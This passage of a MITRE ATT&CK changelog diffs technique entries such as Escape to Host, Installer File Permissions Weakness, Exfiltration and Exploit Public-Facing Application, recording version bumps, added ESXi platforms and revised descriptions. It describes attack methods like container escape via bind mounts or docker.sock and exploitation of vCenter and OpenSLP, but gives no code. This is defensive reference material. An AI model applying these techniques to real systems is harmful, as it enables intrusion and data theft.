Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host. | Adversaries may break out of a container or virtualized environment to gain access to the underlying host. This can allow an adversary access to other containerized or virtualized resources from the host level or to the host itself. In principle, containerized / virtualized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape from a container to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)
Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)
In ESXi environments, an adversary may exploit a vulnerability in order to escape from a virtual machine into the hypervisor.(Citation: Broadcom VMSA-2025-004)
Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers or virtual machines running on the host, or setting up a command and control channel on the host. |
| x_mitre_version | 1.5 | 1.6 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Broadcom VMSA-2025-004', 'description': 'Broadcom. (2025, March 6). VMSA-2025-0004: Questions & Answers. Retrieved March 26, 2025.', 'url': 'https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/security-advisories/vmsa-2025-0004'} |
| x_mitre_platforms | | ESXi |
[T1557.004] Adversary-in-the-Middle: Evil Twin
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-11-11 18:52:53.686000+00:00 | 2025-04-15 19:58:27.842000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1574.005] Hijack Execution Flow: Executable Installer File Permissions Weakness
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may execute their own malicious payloads by hija | t | Adversaries may execute their own malicious payloads by hija |
| cking the binaries used by an installer. These processes may | | cking the binaries used by an installer. These processes may |
| automatically execute specific binaries as part of their fu | | automatically execute specific binaries as part of their fu |
| nctionality or to perform other actions. If the permissions | | nctionality or to perform other actions. If the permissions |
| on the file system directory containing a target binary, or | | on the file system directory containing a target binary, or |
| permissions on the binary itself, are improperly set, then t | | permissions on the binary itself, are improperly set, then t |
| he target binary may be overwritten with another binary usin | | he target binary may be overwritten with another binary usin |
| g user-level permissions and executed by the original proces | | g user-level permissions and executed by the original proces |
| s. If the original process and thread are running under a hi | | s. If the original process and thread are running under a hi |
| gher permissions level, then the replaced binary will also e | | gher permissions level, then the replaced binary will also e |
| xecute under higher-level permissions, which could include S | | xecute under higher-level permissions, which could include S |
| YSTEM. Another variation of this technique can be performed | | YSTEM. Another variation of this technique can be performed |
| by taking advantage of a weakness that is common in executa | | by taking advantage of a weakness that is common in executa |
| ble, self-extracting installers. During the installation pro | | ble, self-extracting installers. During the installation pro |
| cess, it is common for installers to use a subdirectory with | | cess, it is common for installers to use a subdirectory with |
| in the <code>%TEMP%</code> directory to unpack binaries such | | in the <code>%TEMP%</code> directory to unpack binaries such |
| as DLLs, EXEs, or other payloads. When installers create su | | as DLLs, EXEs, or other payloads. When installers create su |
| bdirectories and files they often do not set appropriate per | | bdirectories and files they often do not set appropriate per |
| missions to restrict write access, which allows for executio | | missions to restrict write access, which allows for executio |
| n of untrusted code placed in the subdirectories or overwrit | | n of untrusted code placed in the subdirectories or overwrit |
| ing of binaries used in the installation process. This behav | | ing of binaries used in the installation process. This behav |
| ior is related to and may take advantage of [DLL Search Orde | | ior is related to and may take advantage of [DLL](https://at |
| r Hijacking](https://attack.mitre.org/techniques/T1574/001). | | tack.mitre.org/techniques/T1574/001) search order hijacking. |
| Adversaries may use this technique to replace legitimate b | | Adversaries may use this technique to replace legitimate b |
| inaries with malicious ones as a means of executing code at | | inaries with malicious ones as a means of executing code at |
| a higher permissions level. Some installers may also require | | a higher permissions level. Some installers may also require |
| elevated privileges that will result in privilege escalatio | | elevated privileges that will result in privilege escalatio |
| n when executing adversary controlled code. This behavior is | | n when executing adversary controlled code. This behavior is |
| related to [Bypass User Account Control](https://attack.mit | | related to [Bypass User Account Control](https://attack.mit |
| re.org/techniques/T1548/002). Several examples of this weakn | | re.org/techniques/T1548/002). Several examples of this weakn |
| ess in existing common installers have been reported to soft | | ess in existing common installers have been reported to soft |
| ware vendors.(Citation: mozilla_sec_adv_2012) (Citation: Ex | | ware vendors.(Citation: mozilla_sec_adv_2012) (Citation: Ex |
| ecutable Installers are Vulnerable) If the executing process | | ecutable Installers are Vulnerable) If the executing process |
| is set to run at a specific time or during a certain event | | is set to run at a specific time or during a certain event |
| (e.g., system bootup) then this technique can also be used f | | (e.g., system bootup) then this technique can also be used f |
| or persistence. | | or persistence. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['Administrator', 'User', 'SYSTEM'] | |
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-26 19:20:23.030000+00:00 | 2025-04-15 19:58:41.123000+00:00 |
| description | Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. | Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. |
| x_mitre_version | 1.0 | 1.1 |
[T1480] Execution Guardrails
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Host Forensic Analysis', 'Signature-based Detection', 'Static File Analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-06-07 14:30:23.491000+00:00 | 2025-04-15 19:58:48.316000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1048] Exfiltration Over Alternative Protocol
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:57:26.415000+00:00 | 2025-04-15 19:58:54.894000+00:00 |
| x_mitre_version | 1.5 | 1.6 |
| x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1048.002] Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 22:44:11.953000+00:00 | 2025-04-15 19:58:50.294000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1011.001] Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-08 21:02:15.802000+00:00 | 2025-04-15 19:58:35.466000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1041] Exfiltration Over C2 Channel
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_network_requirements | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-07 17:09:14.040000+00:00 | 2025-04-15 19:58:51.597000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 2.2 | 2.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1052] Exfiltration Over Physical Medium
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Presence of physical medium or device'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 22:48:29.702000+00:00 | 2025-04-15 19:59:17.041000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1048.001] Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-28 00:43:24.228000+00:00 | 2025-04-15 19:58:43.571000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1048.003] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_network_requirements | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-12 23:39:25.476000+00:00 | 2025-04-15 19:59:24.041000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 2.1 | 2.2 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1567] Exfiltration Over Web Service
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:57:40.951000+00:00 | 2025-04-15 19:58:25.560000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1567.004] Exfiltration Over Web Service: Exfiltration Over Webhook
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:57:55.928000+00:00 | 2025-04-15 19:58:26.901000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1052.001] Exfiltration Over Physical Medium: Exfiltration over USB
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Presence of physical medium or device'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 22:48:29.490000+00:00 | 2025-04-15 19:58:55.347000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-15 19:11:47.547000+00:00 | 2025-04-15 19:59:03.751000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1567.001] Exfiltration Over Web Service: Exfiltration to Code Repository
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-15 19:08:16.882000+00:00 | 2025-04-15 19:58:48.876000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1567.003] Exfiltration Over Web Service: Exfiltration to Text Storage Sites
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-05-04 18:00:33.023000+00:00 | 2025-04-15 19:59:01.716000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1190] Exploit Public-Facing Application
Current version: 2.7
Version changed from: 2.6 → 2.7
|
|
|---|
| t | Adversaries may attempt to exploit a weakness in an Internet | t | Adversaries may attempt to exploit a weakness in an Internet |
| -facing host or system to initially access a network. The we | | -facing host or system to initially access a network. The we |
| akness in the system can be a software bug, a temporary glit | | akness in the system can be a software bug, a temporary glit |
| ch, or a misconfiguration. Exploited applications are often | | ch, or a misconfiguration. Exploited applications are often |
| websites/web servers, but can also include databases (like | | websites/web servers, but can also include databases (like |
| SQL), standard services (like SMB or SSH), network device ad | | SQL), standard services (like SMB or SSH), network device ad |
| ministration and management protocols (like SNMP and Smart I | | ministration and management protocols (like SNMP and Smart I |
| nstall), and any other system with Internet-accessible open | | nstall), and any other system with Internet-accessible open |
| sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple | | sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple |
| SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network In | | SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network In |
| frastructure Devices 2018)(Citation: Cisco Blog Legacy Devic | | frastructure Devices 2018)(Citation: Cisco Blog Legacy Devic |
| e Attacks)(Citation: NVD CVE-2014-7169) Depending on the fla | | e Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructu |
| w being exploited this may also involve [Exploitation for De | | re, adversaries may exploit exposed OpenSLP services; they m |
| fense Evasion](https://attack.mitre.org/techniques/T1211) or | | ay alternatively exploit exposed VMware vCenter servers.(Cit |
| [Exploitation for Client Execution](https://attack.mitre.or | | ation: Recorded Future ESXiArgs Ransomware 2023)(Citation: A |
| g/techniques/T1203). If an application is hosted on cloud-b | | rs Technica VMWare Code Execution Vulnerability 2021) Depend |
| ased infrastructure and/or is containerized, then exploiting | | ing on the flaw being exploited, this may also involve [Expl |
| it may lead to compromise of the underlying instance or con | | oitation for Defense Evasion](https://attack.mitre.org/techn |
| tainer. This can allow an adversary a path to access the clo | | iques/T1211) or [Exploitation for Client Execution](https:// |
| ud or container APIs (e.g., via the [Cloud Instance Metadata | | attack.mitre.org/techniques/T1203). If an application is ho |
| API](https://attack.mitre.org/techniques/T1552/005)), explo | | sted on cloud-based infrastructure and/or is containerized, |
| it container host access via [Escape to Host](https://attack | | then exploiting it may lead to compromise of the underlying |
| .mitre.org/techniques/T1611), or take advantage of weak iden | | instance or container. This can allow an adversary a path to |
| tity and access management policies. Adversaries may also e | | access the cloud or container APIs (e.g., via the [Cloud In |
| xploit edge network infrastructure and related appliances, s | | stance Metadata API](https://attack.mitre.org/techniques/T15 |
| pecifically targeting devices that do not support robust hos | | 52/005)), exploit container host access via [Escape to Host] |
| t-based defenses.(Citation: Mandiant Fortinet Zero Day)(Cita | | (https://attack.mitre.org/techniques/T1611), or take advanta |
| tion: Wired Russia Cyberwar) For websites and databases, th | | ge of weak identity and access management policies. Adversa |
| e OWASP top 10 and CWE top 25 highlight the most common web- | | ries may also exploit edge network infrastructure and relate |
| based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE | | d appliances, specifically targeting devices that do not sup |
| top 25) | | port robust host-based defenses.(Citation: Mandiant Fortinet |
| | | Zero Day)(Citation: Wired Russia Cyberwar) For websites an |
| | | d databases, the OWASP top 10 and CWE top 25 highlight the m |
| | | ost common web-based vulnerabilities.(Citation: OWASP Top 10 |
| | | )(Citation: CWE top 25) |
New Mitigations:
- M1035: Limit Access to Resource Over Network
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-24 14:33:53.433000+00:00 | 2025-04-15 19:58:25.266000+00:00 |
| description | Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) | Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) |
| x_mitre_version | 2.6 | 2.7 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Ars Technica VMWare Code Execution Vulnerability 2021', 'description': 'Dan Goodin . (2021, February 25). Code-execution flaw in VMware has a severity rating of 9.8 out of 10. Retrieved April 8, 2025.', 'url': 'https://arstechnica.com/information-technology/2021/02/armed-with-exploits-hackers-on-the-prowl-for-a-critical-vmware-vulnerability/'} |
| external_references | | {'source_name': 'Recorded Future ESXiArgs Ransomware 2023', 'description': 'German Hoeffner, Aaron Soehnen and Gianni Perez. (2023, February 7). ESXiArgs Ransomware Targets Publicly-Exposed ESXi OpenSLP Servers. Retrieved March 26, 2025.', 'url': 'https://www.recordedfuture.com/blog/esxiargs-ransomware-targets-vmware-esxi-openslp-servers'} |
| x_mitre_platforms | | Network Devices |
| x_mitre_platforms | | ESXi |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1203] Exploitation for Client Execution
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
| x_mitre_system_requirements | ['Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:34:23.908000+00:00 | 2025-04-15 19:59:03.090000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
[T1211] Exploitation for Defense Evasion
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'System access controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-15 11:41:47.274000+00:00 | 2025-04-15 19:59:24.778000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
[T1068] Exploitation for Privilege Escalation
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['User'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-07 17:13:54.168000+00:00 | 2025-04-15 19:58:58.811000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.5 | 1.6 |
[T1210] Exploitation of Remote Services
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may exploit remote services to gain unauthorized | t | Adversaries may exploit remote services to gain unauthorized |
| access to internal systems once inside of a network. Exploi | | access to internal systems once inside of a network. Exploi |
| tation of a software vulnerability occurs when an adversary | | tation of a software vulnerability occurs when an adversary |
| takes advantage of a programming error in a program, service | | takes advantage of a programming error in a program, service |
| , or within the operating system software or kernel itself t | | , or within the operating system software or kernel itself t |
| o execute adversary-controlled code. A common goal for post- | | o execute adversary-controlled code. A common goal for post- |
| compromise exploitation of remote services is for lateral mo | | compromise exploitation of remote services is for lateral mo |
| vement to enable access to a remote system. An adversary ma | | vement to enable access to a remote system. An adversary ma |
| y need to determine if the remote system is in a vulnerable | | y need to determine if the remote system is in a vulnerable |
| state, which may be done through [Network Service Discovery] | | state, which may be done through [Network Service Discovery] |
| (https://attack.mitre.org/techniques/T1046) or other Discove | | (https://attack.mitre.org/techniques/T1046) or other Discove |
| ry methods looking for common, vulnerable software that may | | ry methods looking for common, vulnerable software that may |
| be deployed in the network, the lack of certain patches that | | be deployed in the network, the lack of certain patches that |
| may indicate vulnerabilities, or security software that ma | | may indicate vulnerabilities, or security software that ma |
| y be used to detect or contain remote exploitation. Servers | | y be used to detect or contain remote exploitation. Servers |
| are likely a high value target for lateral movement exploita | | are likely a high value target for lateral movement exploita |
| tion, but endpoint systems may also be at risk if they provi | | tion, but endpoint systems may also be at risk if they provi |
| de an advantage or access to additional resources. There ar | | de an advantage or access to additional resources. There ar |
| e several well-known vulnerabilities that exist in common se | | e several well-known vulnerabilities that exist in common se |
| rvices such as SMB (Citation: CIS Multiple SMB Vulnerabiliti | | rvices such as SMB(Citation: CIS Multiple SMB Vulnerabilitie |
| es) and RDP (Citation: NVD CVE-2017-0176) as well as applica | | s) and RDP(Citation: NVD CVE-2017-0176) as well as applicati |
| tions that may be used within internal networks such as MySQ | | ons that may be used within internal networks such as MySQL( |
| L (Citation: NVD CVE-2016-6662) and web server services.(Cit | | Citation: NVD CVE-2016-6662) and web server services.(Citati |
| ation: NVD CVE-2014-7169) Depending on the permissions leve | | on: NVD CVE-2014-7169)(Citation: Ars Technica VMWare Code Ex |
| l of the vulnerable remote service an adversary may achieve | | ecution Vulnerability 2021) Additionally, there have been a |
| [Exploitation for Privilege Escalation](https://attack.mitre | | number of vulnerabilities in VMware vCenter installations, w |
| .org/techniques/T1068) as a result of lateral movement explo | | hich may enable threat actors to move laterally from the com |
| itation as well. | | promised vCenter server to virtual machines or even to ESXi |
| | | hypervisors.(Citation: Broadcom VMSA-2024-0019) Depending o |
| | | n the permissions level of the vulnerable remote service an |
| | | adversary may achieve [Exploitation for Privilege Escalation |
| | | ](https://attack.mitre.org/techniques/T1068) as a result of |
| | | lateral movement exploitation as well. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
| x_mitre_system_requirements | ['Unpatched software or otherwise vulnerable target. Depending on the target and goal, the system and exploitable service may need to be remotely accessible from the internal network.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-02-24 15:06:46.006000+00:00 | 2025-04-15 19:58:53.590000+00:00 |
| description | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB(Citation: CIS Multiple SMB Vulnerabilities) and RDP(Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL(Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Additionally, there have been a number of vulnerabilities in VMware vCenter installations, which may enable threat actors to move laterally from the compromised vCenter server to virtual machines or even to ESXi hypervisors.(Citation: Broadcom VMSA-2024-0019)
